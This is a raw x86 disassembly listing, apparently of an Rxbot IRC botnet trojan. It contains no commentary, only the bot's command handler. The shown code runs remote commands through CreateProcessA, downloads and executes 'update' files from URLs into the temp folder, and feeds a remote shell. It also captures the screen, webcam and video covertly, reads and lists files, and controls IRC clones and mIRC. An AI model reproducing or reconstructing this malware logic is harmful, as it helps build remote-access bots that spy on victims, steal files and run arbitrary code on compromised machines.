jz short loc_40C92F
push [ebp+var_10]
push [ebp+var_14]
call sub_4173D0
cmp eax, esi
pop ecx
pop ecx
jz short loc_40C92F
push eax
lea eax, [ebp+var_12B8]
push eax
call sub_416905
pop ecx
pop ecx
loc_40C92F: ; CODE XREF: sub_409806+3107�j
; sub_409806+3118�j
push [ebp+var_9C]
lea eax, [ebp+var_143C]
push 80h
push eax
call sub_416B5D
mov eax, [ebp+arg_4]
mov [ebp+var_1440], eax
mov eax, [ebp+var_4]
mov [ebp+var_11B0], eax
mov eax, [ebp+var_C]
mov [ebp+var_11AC], eax
lea eax, [ebp+var_12B8]
push eax
lea eax, [ebp+var_13BC]
push eax
push offset aFindfileSear_0 ; "[FINDFILE]: Searching for file: %s in: "...
lea eax, [ebp+var_2F0]
push 200h
push eax
call sub_416B5D
push esi
lea eax, [ebp+var_2F0]
push 1Ch
push eax
call sub_4136B6
add esp, 2Ch
mov [ebp+var_11B4], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_1440]
push eax
push offset sub_4036F0
push esi
push esi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_11B4]
imul ecx, 234h
cmp eax, esi
mov dword_43B254[ecx], eax
jnz short loc_40C9F4
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aFindfileFailed ; "[FINDFILE]: Failed to start search thre"...
loc_40C9D8: ; CODE XREF: sub_409806+4769�j
; sub_409806+54ED�j
lea eax, [ebp+var_2F0]
push eax
call sub_416905
add esp, 0Ch
jmp loc_40EE11
; ---------------------------------------------------------------------------
loc_40C9EC: ; CODE XREF: sub_409806+31F4�j
push 32h
call dword_422000 ; Sleep
loc_40C9F4: ; CODE XREF: sub_409806+31C4�j
cmp [ebp+var_11A8], esi
jz short loc_40C9EC
jmp loc_40EE11
; ---------------------------------------------------------------------------
loc_40CA01: ; CODE XREF: sub_409806+24B0�j
; sub_409806+24C4�j
push 11h
pop ecx
push [ebp+var_8]
xor eax, eax
xor ebx, ebx
lea edi, [ebp+var_334]
rep stosd
inc ebx
xor esi, esi
mov [ebp+var_334], 44h
mov [ebp+var_308], ebx
mov word ptr [ebp+var_304], si
call sub_416C92
cmp eax, ebx
pop ecx
jnz short loc_40CA40
mov word ptr [ebp+var_304], 5
loc_40CA40: ; CODE XREF: sub_409806+322F�j
cmp [ebp+var_14], esi
jz loc_40D834
push [ebp+var_10]
push [ebp+var_14]
call sub_4173D0
mov edi, eax
cmp edi, esi
pop ecx
pop ecx
jz loc_40D834
lea eax, [ebp+var_73C]
push eax
lea eax, [ebp+var_334]
push eax
push esi
push esi
push 30h
push ebx
push esi
push esi
push edi
push esi
call dword_422044 ; CreateProcessA
test eax, eax
lea eax, [ebp+var_2F0]
jnz short loc_40CA99
push offset aExecCouldnTExe ; "[EXEC]: Couldn't execute file."
push eax
call sub_416905
pop ecx
pop ecx
jmp loc_40D834
; ---------------------------------------------------------------------------
loc_40CA99: ; CODE XREF: sub_409806+327F�j
push edi
push offset aExecCommandsS ; "[EXEC]: Commands: %s"
jmp loc_40D82B
; ---------------------------------------------------------------------------
loc_40CAA4: ; CODE XREF: sub_409806+2488�j
; sub_409806+249C�j
mov edi, [ebp+var_10]
mov esi, offset aRxbot012 ; "Rxbot012"
loc_40CAAC: ; CODE XREF: sub_409806+32C2�j
mov cl, [esi]
mov al, cl
cmp cl, [edi]
jnz short loc_40CACE
test al, al
jz short loc_40CACA
mov cl, [esi+1]
mov al, cl
cmp cl, [edi+1]
jnz short loc_40CACE
inc esi
inc esi
inc edi
inc edi
test al, al
jnz short loc_40CAAC
loc_40CACA: ; CODE XREF: sub_409806+32B0�j
xor eax, eax
jmp short loc_40CAD3
; ---------------------------------------------------------------------------
loc_40CACE: ; CODE XREF: sub_409806+32AC�j
; sub_409806+32BA�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_40CAD3: ; CODE XREF: sub_409806+32C6�j
test eax, eax
mov edi, [ebp+arg_4]
jz loc_40CC46
lea eax, [ebp+var_84C]
push eax
push 104h
call dword_4220D0 ; GetTempPathA
push 0FFh
push [ebp+var_8]
lea eax, [ebp+var_E00]
push eax
call sub_4169C0
lea eax, [ebp+var_748]
push eax
call sub_410DDA
push eax
lea eax, [ebp+var_84C]
push eax
lea eax, [ebp+var_D00]
push offset aSS_exe ; "%s%s.exe"
push eax
call sub_416905
mov eax, [ebp+ebx+var_98]
xor esi, esi
add esp, 20h
cmp eax, esi
mov [ebp+var_AFC], 1
mov [ebp+var_AF8], esi
jz short loc_40CB5D
push 10h
push esi
push eax
call sub_417729
add esp, 0Ch
mov [ebp+var_AF0], eax
jmp short loc_40CB63
; ---------------------------------------------------------------------------
loc_40CB5D: ; CODE XREF: sub_409806+3341�j
mov [ebp+var_AF0], esi
loc_40CB63: ; CODE XREF: sub_409806+3355�j
mov ebx, [ebp+ebx+var_94]
cmp ebx, esi
jz short loc_40CB7D
push ebx
call sub_416C92
pop ecx
mov [ebp+var_AF4], eax
jmp short loc_40CB83
; ---------------------------------------------------------------------------
loc_40CB7D: ; CODE XREF: sub_409806+3366�j
mov [ebp+var_AF4], esi
loc_40CB83: ; CODE XREF: sub_409806+3375�j
movzx eax, [ebp+var_38B]
push 7Fh
push [ebp+var_9C]
mov [ebp+var_AEC], eax
lea eax, [ebp+var_E80]
push eax
mov [ebp+var_E84], edi
call sub_4169C0
mov eax, [ebp+var_4]
push [ebp+var_8]
mov [ebp+var_AE4], eax
mov eax, [ebp+var_C]
mov [ebp+var_AE8], eax
lea eax, [ebp+var_2F0]
push offset aUpdateDownload ; "[UPDATE]: Downloading update from: %s."
push eax
call sub_416905
push edi
lea eax, [ebp+var_2F0]
push 17h
push eax
call sub_4136B6
add esp, 24h
mov [ebp+var_B00], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_E84]
push eax
push offset sub_402C2F
push esi
push esi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_B00]
imul ecx, 234h
cmp eax, esi
mov dword_43B254[ecx], eax
jnz short loc_40CC3C
call dword_422004 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_2F0]
push offset aUpdateFailedTo ; "[UPDATE]: Failed to start download thre"...
push eax
call sub_416905
add esp, 0Ch
jmp short loc_40CC48
; ---------------------------------------------------------------------------
loc_40CC34: ; CODE XREF: sub_409806+343C�j
push 32h
call dword_422000 ; Sleep
loc_40CC3C: ; CODE XREF: sub_409806+340F�j
cmp [ebp+var_AE0], esi
jz short loc_40CC34
jmp short loc_40CC48
; ---------------------------------------------------------------------------
loc_40CC46: ; CODE XREF: sub_409806+32D2�j
xor esi, esi
loc_40CC48: ; CODE XREF: sub_409806+342C�j
; sub_409806+343E�j
cmp [ebp+var_C], esi
jnz loc_40AEF2
push esi
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push edi
jmp loc_40AEEA
; ---------------------------------------------------------------------------
loc_40CC68: ; CODE XREF: sub_409806+2460�j
; sub_409806+2474�j
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_42A8E8
pop ecx
xor eax, eax
repe cmpsb
jz loc_409A84
cmp [ebp+var_14], eax
jz loc_409A84
push [ebp+var_10]
push [ebp+var_14]
call sub_4173D0
push eax
push [ebp+var_9C]
lea eax, [ebp+var_2F0]
push [ebp+var_A0]
push [ebp+var_A4]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_416905
push 1FFh
lea eax, [ebp+var_2F0]
push eax
push [ebp+arg_0]
call sub_4169C0
push [ebp+var_8]
call sub_416C92
add esp, 30h
test eax, eax
jle short loc_40CCF1
push [ebp+var_8]
call sub_416C92
imul eax, 3E8h
pop ecx
push eax
call dword_422000 ; Sleep
loc_40CCF1: ; CODE XREF: sub_409806+34D3�j
push offset aMainDelay_ ; "[MAIN]: Delay."
call sub_401ECD
mov eax, [ebp+arg_24]
pop ecx
inc eax
jmp loc_409A87
; ---------------------------------------------------------------------------
loc_40CD05: ; CODE XREF: sub_409806+2438�j
; sub_409806+244C�j
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_42A8E8
pop ecx
xor eax, eax
repe cmpsb
jz loc_409A84
cmp [ebp+var_14], eax
jz loc_40F8C3
mov esi, [ebp+var_10]
push esi
push [ebp+var_14]
call sub_4173D0
pop ecx
pop ecx
mov ebx, eax
push 7
inc esi
pop ecx
xor eax, eax
mov edi, offset aRepeat ; "repeat"
repe cmpsb
lea eax, [ebp+var_2F0]
push ebx
jz short loc_40CDBF
push [ebp+var_9C]
push [ebp+var_A0]
push [ebp+var_A4]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_416905
push 1FFh
lea eax, [ebp+var_2F0]
push eax
push [ebp+arg_0]
call sub_4169C0
push ebx
lea eax, [ebp+var_2F0]
push offset aMainRepeatS ; "[MAIN]: Repeat: %s"
push eax
call sub_416905
lea eax, [ebp+var_2F0]
push eax
call sub_401ECD
push [ebp+var_8]
call sub_416C92
add esp, 38h
test eax, eax
jle loc_40F8C3
push [ebp+var_8]
call sub_416C92
add eax, [ebp+arg_24]
pop ecx
jmp loc_409A87
; ---------------------------------------------------------------------------
loc_40CDBF: ; CODE XREF: sub_409806+3544�j
push offset aMainRepeatNotA ; "[MAIN]: Repeat not allowed in command l"...
jmp loc_40D4BA
; ---------------------------------------------------------------------------
loc_40CDC9: ; CODE XREF: sub_409806+2410�j
; sub_409806+2424�j
push [ebp+var_10]
lea eax, [ebp+var_2F0]
push offset aPartS_0 ; "PART %s"
push eax
call sub_416905
push [ebp+var_8]
call sub_416C92
add esp, 10h
loc_40CDE8: ; CODE XREF: sub_409806+364F�j
test eax, eax
jle loc_40F8C3
push [ebp+var_8]
call sub_416C92
cmp eax, 1F4h
pop ecx
jge loc_40F8C3
loc_40CE04: ; CODE XREF: sub_409806+4196�j
lea eax, [ebp+var_2F0]
push eax
push offset aS_5 ; "%s\r\n"
push [ebp+var_8]
call sub_416C92
imul eax, 234h
pop ecx
push dword_43B24C[eax]
call sub_405CD5
jmp loc_40EA9D
; ---------------------------------------------------------------------------
loc_40CE2F: ; CODE XREF: sub_409806+23E8�j
; sub_409806+23FC�j
push [ebp+ebx+var_98]
lea eax, [ebp+var_2F0]
push [ebp+var_10]
push offset aJoinSS ; "JOIN %s %s"
push eax
call sub_416905
push [ebp+var_8]
call sub_416C92
add esp, 14h
jmp short loc_40CDE8
; ---------------------------------------------------------------------------
loc_40CE57: ; CODE XREF: sub_409806+23C0�j
; sub_409806+23D4�j
push [ebp+var_10]
lea eax, [ebp+var_2F0]
push offset aNickS ; "NICK %s"
push eax
call sub_416905
mov esi, [ebp+var_8]
push esi
call sub_416C92
add esp, 10h
test eax, eax
jle loc_40F8C3
push esi
call sub_416C92
cmp eax, 1F4h
pop ecx
jge loc_40F8C3
lea eax, [ebp+var_2F0]
push eax
push offset aS_5 ; "%s\r\n"
push esi
call sub_416C92
imul eax, 234h
pop ecx
push dword_43B24C[eax]
call sub_405CD5
push [ebp+var_10]
push esi
push offset aCloneNickSS ; "[CLONE]: Nick (%s): %s"
loc_40CEBE: ; CODE XREF: sub_409806+3743�j
; sub_409806+37B2�j ...
call sub_401F41
jmp loc_40E76E
; ---------------------------------------------------------------------------
loc_40CEC8: ; CODE XREF: sub_409806+2398�j
; sub_409806+23AC�j
cmp [ebp+var_14], 0
jz loc_40F8C3
push [ebp+var_10]
push [ebp+var_14]
call sub_4173D0
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz short loc_40CEFA
push esi
lea eax, [ebp+var_2F0]
push offset aModeS ; "MODE %s"
push eax
call sub_416905
add esp, 0Ch
loc_40CEFA: ; CODE XREF: sub_409806+36DD�j
mov edi, [ebp+var_8]
push edi
call sub_416C92
test eax, eax
pop ecx
jle loc_40F8C3
push edi
call sub_416C92
cmp eax, 1F4h
pop ecx
jge loc_40F8C3
lea eax, [ebp+var_2F0]
push eax
push offset aS_5 ; "%s\r\n"
push edi
call sub_416C92
imul eax, 234h
pop ecx
push dword_43B24C[eax]
call sub_405CD5
push esi
push edi
push offset aCloneModeSS ; "[CLONE]: Mode (%s): %s"
jmp loc_40CEBE
; ---------------------------------------------------------------------------
loc_40CF4E: ; CODE XREF: sub_409806+2370�j
; sub_409806+2384�j
cmp [ebp+var_14], 0
jz loc_40F8C3
push [ebp+var_10]
push [ebp+var_14]
call sub_4173D0
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40F8C3
mov edi, [ebp+var_8]
push edi
call sub_416C92
test eax, eax
pop ecx
jle loc_40F8C3
push edi
call sub_416C92
cmp eax, 1F4h
pop ecx
jge loc_40F8C3
push esi
push offset aS_5 ; "%s\r\n"
push edi
call sub_416C92
imul eax, 234h
pop ecx
push dword_43B24C[eax]
call sub_405CD5
push esi
push edi
push offset aCloneRawSS ; "[CLONE]: Raw (%s): %s"
jmp loc_40CEBE
; ---------------------------------------------------------------------------
loc_40CFBD: ; CODE XREF: sub_409806+2348�j
; sub_409806+235C�j
cmp [ebp+var_14], 0
jz loc_40F8C3
push [ebp+var_8]
push [ebp+var_14]
call sub_4173D0
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40F8C3
push esi
push offset aModeS_0 ; "MODE %s\r\n"
push [ebp+arg_4]
call sub_405CD5
push esi
push offset aMainModeChange ; "[MAIN]: Mode change: %s"
jmp loc_40DB96
; ---------------------------------------------------------------------------
loc_40CFF7: ; CODE XREF: sub_409806+2320�j
; sub_409806+2334�j
mov edi, [ebp+var_A0]
push 4
mov esi, offset dword_42A8E8
pop ecx
xor eax, eax
repe cmpsb
jz loc_409A84
push [ebp+var_10]
push offset aPartS ; "PART %s\r\n"
push [ebp+arg_4]
call sub_405CD5
push [ebp+var_8]
call sub_416C92
imul eax, 3E8h
add esp, 10h
push eax
call dword_422000 ; Sleep
push [ebp+ebx+var_98]
push [ebp+var_10]
push offset aJoinSS_0 ; "JOIN %s %s\r\n"
push [ebp+arg_4]
call sub_405CD5
push offset aMainCycle_ ; "[MAIN]: Cycle."
call sub_401ECD
jmp loc_40DB9B
; ---------------------------------------------------------------------------
loc_40D05D: ; CODE XREF: sub_409806+22F8�j
; sub_409806+230C�j
cmp [ebp+var_14], 0
jz loc_40F8C3
lea edx, [eax+1]
loc_40D06A: ; CODE XREF: sub_409806+3869�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40D06A
sub eax, edx
mov ecx, eax
mov eax, [ebp+var_8]
lea esi, [eax+1]
loc_40D07B: ; CODE XREF: sub_409806+387A�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40D07B
push [ebp+var_10]
sub eax, esi
add eax, ecx
mov ecx, [ebp+var_14]
lea eax, [eax+ecx+2]
push eax
call sub_4173D0
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40F8C3
push esi
lea eax, [ebp+var_2F0]
push offset dword_429D54
push eax
call sub_416905
push 0
push 0
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_8]
push [ebp+arg_4]
call sub_405D20
push esi
push [ebp+var_8]
push offset aMainActionSS_ ; "[MAIN]: Action: %s: %s."
call sub_401F41
add esp, 2Ch
jmp loc_40F8C3
; ---------------------------------------------------------------------------
loc_40D0E0: ; CODE XREF: sub_409806+22D0�j
; sub_409806+22E4�j
cmp [ebp+var_14], 0
jz loc_40F8C3
lea edx, [eax+1]
loc_40D0ED: ; CODE XREF: sub_409806+38EC�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_40D0ED
sub eax, edx
mov ecx, eax
mov eax, [ebp+var_8]
lea esi, [eax+1]
loc_40D0FE: ; CODE XREF: sub_409806+38FD�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_40D0FE
push [ebp+var_10]
sub eax, esi
add eax, ecx
mov ecx, [ebp+var_14]
lea eax, [eax+ecx+2]
push eax
call sub_4173D0
mov esi, eax
test esi, esi
pop ecx
pop ecx
jz loc_40F8C3
push 0
push 0
push esi
push [ebp+var_8]
push [ebp+arg_4]
call sub_405D20
push esi
push [ebp+var_8]
push offset aMainPrivmsgSS_ ; "[MAIN]: Privmsg: %s: %s."
call sub_401F41
loc_40D143: ; CODE XREF: sub_409806+5CBF�j
add esp, 20h
jmp loc_40F8C3
; ---------------------------------------------------------------------------
loc_40D14B: ; CODE XREF: sub_409806+22A8�j
; sub_409806+22BC�j
cmp [ebp+var_14], 0
jz loc_409A84
push [ebp+var_10]
push [ebp+var_14]
call sub_4173D0
test eax, eax
pop ecx
pop ecx
jz loc_409A84
push eax
push [ebp+var_8]
call sub_401DBD
push [ebp+var_8]
lea eax, [ebp+var_2F0]
push offset aMainAliasAdded ; "[MAIN]: Alias added: %s."
push eax
call sub_416905
add esp, 14h
loc_40D18A: ; CODE XREF: sub_409806+4281�j
; sub_409806+56AB�j
cmp [ebp+var_C], 0
jnz short loc_40D1AD
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D20
add esp, 14h
loc_40D1AD: ; CODE XREF: sub_409806+3988�j
; sub_409806+4E72�j ...
lea eax, [ebp+var_2F0]
push eax
call sub_401ECD
jmp loc_40FA82
; ---------------------------------------------------------------------------
loc_40D1BE: ; CODE XREF: sub_409806+2162�j
; sub_409806+2176�j
push [ebp+var_8]
push [ebp+arg_1C]
call sub_4173D0
test eax, eax
pop ecx
pop ecx
jz loc_40F8C3
mov ebx, [ebp+ebx+var_9C]
test ebx, ebx
jz short loc_40D259
push ebx
push [ebp+var_14]
call sub_4173D0
mov esi, eax
test esi, esi
pop ecx
pop ecx
lea eax, [ebp+var_2F0]
jz short loc_40D247
push esi
push [ebp+var_9C]
push [ebp+var_A0]
push [ebp+var_A4]
push offset aSSSS ; "%s %s %s :%s"
push eax
call sub_416905
push 1FFh
lea eax, [ebp+var_2F0]
push eax
push [ebp+arg_0]
call sub_4169C0
push esi
push [ebp+var_8]
lea eax, [ebp+var_2F0]
push offset aMainGethostSCo ; "[MAIN]: Gethost: %s, Command: %s"
push eax
call sub_416905
add esp, 34h
inc [ebp+arg_24]
jmp loc_40D630
; ---------------------------------------------------------------------------
loc_40D247: ; CODE XREF: sub_409806+39ED�j
push offset aMainUnableToEx ; "[MAIN]: Unable to extract Gethost comma"...
push eax
call sub_416905
pop ecx
pop ecx
jmp loc_40D630
; ---------------------------------------------------------------------------
loc_40D259: ; CODE XREF: sub_409806+39D6�j
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push [ebp+arg_4]
push [ebp+arg_1C]
push eax
call sub_412D55
add esp, 0Ch
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D20
push [ebp+var_8]
lea eax, [ebp+var_2F0]
push offset aMainGethostS_ ; "[MAIN]: Gethost: %s."
push 200h
push eax
call sub_416B5D
add esp, 24h
jmp loc_40D630
; ---------------------------------------------------------------------------
loc_40D2A3: ; CODE XREF: sub_409806+213A�j
; sub_409806+214E�j
mov esi, [ebp+var_8]
push 7
mov edi, offset aScreen ; "screen"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40D2FC
mov esi, [ebp+ebx+var_9C]
test esi, esi
jz short loc_40D2E9
push esi
call sub_402183
cmp eax, 1
pop ecx
lea eax, [ebp+var_2F0]
jnz short loc_40D2E2
push esi
push offset aCaptureScreenC ; "[CAPTURE]: Screen capture saved to: %s."...
push eax
call sub_416905
add esp, 0Ch
jmp short loc_40D2FC
; ---------------------------------------------------------------------------
loc_40D2E2: ; CODE XREF: sub_409806+3AC9�j
push offset aCaptureErrorWh ; "[CAPTURE]: Error while capturing screen"...
jmp short loc_40D2F4
; ---------------------------------------------------------------------------
loc_40D2E9: ; CODE XREF: sub_409806+3AB7�j
push offset aCaptureNoFilen ; "[CAPTURE]: No filename specified for sc"...
lea eax, [ebp+var_2F0]
loc_40D2F4: ; CODE XREF: sub_409806+3AE1�j
push eax
call sub_416905
pop ecx
pop ecx
loc_40D2FC: ; CODE XREF: sub_409806+3AAC�j
; sub_409806+3ADA�j
mov esi, [ebp+var_8]
push 8
mov edi, offset aDrivers ; "drivers"
pop ecx
xor eax, eax
repe cmpsb
jnz short loc_40D389
xor edi, edi
mov esi, 0FFh
loc_40D314: ; CODE XREF: sub_409806+3B6E�j
push 1FFh
lea eax, [ebp+var_ADC]
push eax
push esi
lea eax, [ebp+var_1548]
push eax
push edi
call dword_43A434
test eax, eax
jz short loc_40D370
lea eax, [ebp+var_ADC]
push eax
lea eax, [ebp+var_1548]
push eax
push edi
lea eax, [ebp+var_EDC]
push offset aCaptureDriverD ; "[CAPTURE]: Driver #%d - %s - %s."
push eax
call sub_416905
push 0
push [ebp+var_4]
lea eax, [ebp+var_EDC]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D20
add esp, 28h
loc_40D370: ; CODE XREF: sub_409806+3B2B�j
inc edi
cmp edi, 0Ah
jl short loc_40D314
lea eax, [ebp+var_2F0]
push offset aCaptureDriverL ; "[CAPTURE]: Driver list complete."
push eax
call sub_416905
pop ecx
pop ecx
loc_40D389: ; CODE XREF: sub_409806+3B05�j
mov esi, [ebp+var_8]
push 6
mov edi, offset aFrame ; "frame"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40D425
cmp [ebp+ebx+var_9C], eax
jz short loc_40D412
mov edi, [ebp+ebx+var_98]
test edi, edi
jz short loc_40D412
mov esi, [ebp+ebx+var_94]
test esi, esi
jz short loc_40D412
mov eax, [ebp+ebx+var_90]
test eax, eax
jz short loc_40D412
push eax
call sub_416C92
pop ecx
push eax
push esi
call sub_416C92
pop ecx
push eax
push edi
call sub_416C92
mov esi, [ebp+ebx+var_9C]
pop ecx
push eax
push esi
call sub_4023C0
add esp, 10h
test eax, eax
lea eax, [ebp+var_2F0]
jnz short loc_40D40B
push esi
push offset aCaptureWebcamC ; "[CAPTURE]: Webcam capture saved to: %s."...
push eax
call sub_416905
add esp, 0Ch
jmp short loc_40D425
; ---------------------------------------------------------------------------
loc_40D40B: ; CODE XREF: sub_409806+3BF2�j
push offset aCaptureError_0 ; "[CAPTURE]: Error while capturing from w"...
jmp short loc_40D41D
; ---------------------------------------------------------------------------
loc_40D412: ; CODE XREF: sub_409806+3B9F�j
; sub_409806+3BAA�j ...
push offset aCaptureInvalid ; "[CAPTURE]: Invalid parameters for webca"...
lea eax, [ebp+var_2F0]
loc_40D41D: ; CODE XREF: sub_409806+3C0A�j
push eax
call sub_416905
pop ecx
pop ecx
loc_40D425: ; CODE XREF: sub_409806+3B92�j
; sub_409806+3C03�j
mov esi, [ebp+var_8]
push 6
mov edi, offset aVideo ; "video"
pop ecx
xor eax, eax
repe cmpsb
jnz loc_40D60D
mov eax, [ebp+ebx+var_9C]
test eax, eax
mov [ebp+var_10], eax
jz loc_40D4D2
mov eax, [ebp+ebx+var_98]
test eax, eax
mov [ebp+arg_0], eax
jz short loc_40D4D2
mov edi, [ebp+ebx+var_94]
test edi, edi
jz short loc_40D4D2
mov esi, [ebp+ebx+var_90]
test esi, esi
jz short loc_40D4D2
mov ebx, [ebp+ebx+var_8C]
test ebx, ebx
jz short loc_40D4D2
push ebx
call sub_416C92
pop ecx
push eax
push esi
call sub_416C92
pop ecx
push eax
push edi
call sub_416C92
pop ecx
push eax
push [ebp+arg_0]
call sub_416C92
pop ecx
push eax
push [ebp+var_10]
call sub_4025BC
add esp, 14h
test eax, eax
lea eax, [ebp+var_2F0]
jnz short loc_40D4C8
push [ebp+var_10]
push offset aCaptureAmateur ; "[CAPTURE]: Amateur video saved to: %s."
loc_40D4BA: ; CODE XREF: sub_409806+35BE�j
push eax
call sub_416905
add esp, 0Ch
jmp loc_40D60D
; ---------------------------------------------------------------------------
loc_40D4C8: ; CODE XREF: sub_409806+3CAA�j
push offset aCaptureError_1 ; "[CAPTURE]: Error while capturing amateu"...
jmp loc_40D605
; ---------------------------------------------------------------------------
loc_40D4D2: ; CODE XREF: sub_409806+3C40�j
; sub_409806+3C52�j ...
push offset aCaptureInval_0 ; "[CAPTURE]: Invalid parameters for amate"...
lea eax, [ebp+var_2F0]
jmp loc_40D605
; ---------------------------------------------------------------------------
loc_40D4E2: ; CODE XREF: sub_409806+1B83�j
; sub_409806+1B97�j
push offset aR ; "r"
push [ebp+var_8]
call sub_41719C
mov edi, eax
test edi, edi
pop ecx
pop ecx
jz short loc_40D560
push edi
mov esi, 200h
lea eax, [ebp+var_2F0]
push esi
push eax
call sub_418177
add esp, 0Ch
jmp short loc_40D53A
; ---------------------------------------------------------------------------
loc_40D50F: ; CODE XREF: sub_409806+3D36�j
push 1
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D20
push edi
lea eax, [ebp+var_2F0]
push esi
push eax
call sub_418177
add esp, 20h
loc_40D53A: ; CODE XREF: sub_409806+3D07�j
test eax, eax
jnz short loc_40D50F
push edi
call sub_416E0D
push [ebp+var_8]
lea eax, [ebp+var_2F0]
push offset aMainReadFileCo ; "[MAIN]: Read file complete: %s"
push eax
call sub_416905
add esp, 10h
jmp loc_40AEF2
; ---------------------------------------------------------------------------
loc_40D560: ; CODE XREF: sub_409806+3CEF�j
push [ebp+var_8]
push offset aMainReadFileFa ; "[MAIN]: Read file failed: %s"
jmp loc_40ED17
; ---------------------------------------------------------------------------
loc_40D56D: ; CODE XREF: sub_409806+1B5B�j
; sub_409806+1B6F�j
cmp [ebp+var_14], 0
jz loc_40F8C3
push [ebp+var_8]
push [ebp+var_14]
call sub_4173D0
mov ebx, eax
test ebx, ebx
pop ecx
pop ecx
jz loc_40F8C3
mov edi, ebx
dec edi
loc_40D591: ; CODE XREF: sub_409806+3D91�j
mov al, [edi+1]
inc edi
test al, al
jnz short loc_40D591
mov esi, offset asc_4236F8 ; "\n"
push ebx
movsw
call sub_410454
test eax, eax
pop ecx
lea eax, [ebp+var_2F0]
jnz short loc_40D5B8
push offset aCmdErrorSendin ; "[CMD]: Error sending to remote shell."
jmp short loc_40D605
; ---------------------------------------------------------------------------
loc_40D5B8: ; CODE XREF: sub_409806+3DA9�j
push ebx
push offset aCmdCommandsS ; "[CMD]: Commands: %s"
push eax
call sub_416905
add esp, 0Ch
jmp short loc_40D630
; ---------------------------------------------------------------------------
loc_40D5C9: ; CODE XREF: sub_409806+1B33�j
; sub_409806+1B47�j
cmp [ebp+var_14], 0
jz loc_40F8C3
push [ebp+var_8]
push [ebp+var_14]
call sub_4173D0
test eax, eax
pop ecx
pop ecx
jz loc_40F8C3
push eax
call sub_4073EC
test eax, eax
pop ecx
lea eax, [ebp+var_2F0]
jnz short loc_40D600
push offset aMircClientNotO ; "[mIRC]: Client not open."
jmp short loc_40D605
; ---------------------------------------------------------------------------
loc_40D600: ; CODE XREF: sub_409806+3DF1�j
push offset aMircCommandSen ; "[mIRC]: Command sent."
loc_40D605: ; CODE XREF: sub_409806+3CC7�j
; sub_409806+3CD7�j ...
push eax
call sub_416905
pop ecx
pop ecx
loc_40D60D: ; CODE XREF: sub_409806+3C2E�j
; sub_409806+3CBD�j
cmp [ebp+var_C], 0
jnz short loc_40D630
push 0
push [ebp+var_4]
lea eax, [ebp+var_2F0]
push eax
push [ebp+var_9C]
push [ebp+arg_4]
call sub_405D20
add esp, 14h
loc_40D630: ; CODE XREF: sub_409806+3A3C�j
; sub_409806+3A4E�j ...
lea eax, [ebp+var_2F0]
push eax
call sub_401ECD
pop ecx
jmp loc_40F8C3
; ---------------------------------------------------------------------------
loc_40D642: ; CODE XREF: sub_409806+1B0B�j
; sub_409806+1B1F�j
push 7Fh
push [ebp+var_8]
lea eax, [ebp+var_1840]
push eax
call sub_4169C0
mov ebx, [ebp+ebx+var_9C]
xor esi, esi
add esp, 0Ch
cmp ebx, esi
jz short loc_40D675
push 7Fh
lea eax, [ebp+var_17C0]
push ebx
push eax
call sub_4169C0
add esp, 0Ch
loc_40D675: ; CODE XREF: sub_409806+3E5B�j
push 7Fh
push [ebp+var_9C]
lea eax, [ebp+var_1740]
push eax
call sub_4169C0
mov eax, [ebp+arg_4]
push [ebp+var_8]
mov [ebp+var_1844], eax
mov eax, [ebp+var_C]
mov [ebp+var_16BC], eax
mov eax, [ebp+var_4]
mov [ebp+var_16B8], eax
lea eax, [ebp+var_2F0]
push offset aVisitUrlS_ ; "[VISIT]: URL: %s."
push eax
call sub_416905
push esi
lea eax, [ebp+var_2F0]
push 15h
push eax
call sub_4136B6
add esp, 24h
mov [ebp+var_16C0], eax
lea eax, [ebp+var_18]
push eax
push esi
lea eax, [ebp+var_1844]
push eax
push offset sub_413A01
push esi
push esi
call dword_422008 ; CreateThread
mov ecx, [ebp+var_16C0]
imul ecx, 234h
cmp eax, esi
mov dword_43B254[ecx], eax
jnz short loc_40D727
call dword_422004 ; RtlGetLastWin32Error
push eax
push offset aVisitFailedToS ; "[VISIT]: Failed to start connection thr"...
loc_40D70B: ; CODE XREF: sub_409806+5168�j
lea eax, [ebp+var_2F0]
push eax
call sub_416905
add esp, 0Ch
jmp loc_40AEF2
; ---------------------------------------------------------------------------
loc_40D71F: ; CODE XREF: sub_409806+3F27�j
push 32h
call dword_422000 ; Sleep
loc_40D727: ; CODE XREF: sub_409806+3EF7�j
cmp [ebp+var_16B4], esi
jz short loc_40D71F
jmp loc_40AEF2
; ---------------------------------------------------------------------------
loc_40D734: ; CODE XREF: sub_409806+1AE3�j
; sub_409806+1AF7�j
push 0
push [ebp+var_9C]
push [ebp+arg_4]
push [ebp+var_8]
call sub_404807
push [ebp+var_8]
push offset aFileListS ; "[FILE]: List: %s"
jmp loc_40CEBE
; ---------------------------------------------------------------------------
loc_40D754: ; CODE XREF: sub_409806+1ABB�j
; sub_409806+1ACF�j
push 20h
push [ebp+var_8]
call dword_4220CC ; SetFileAttributesA
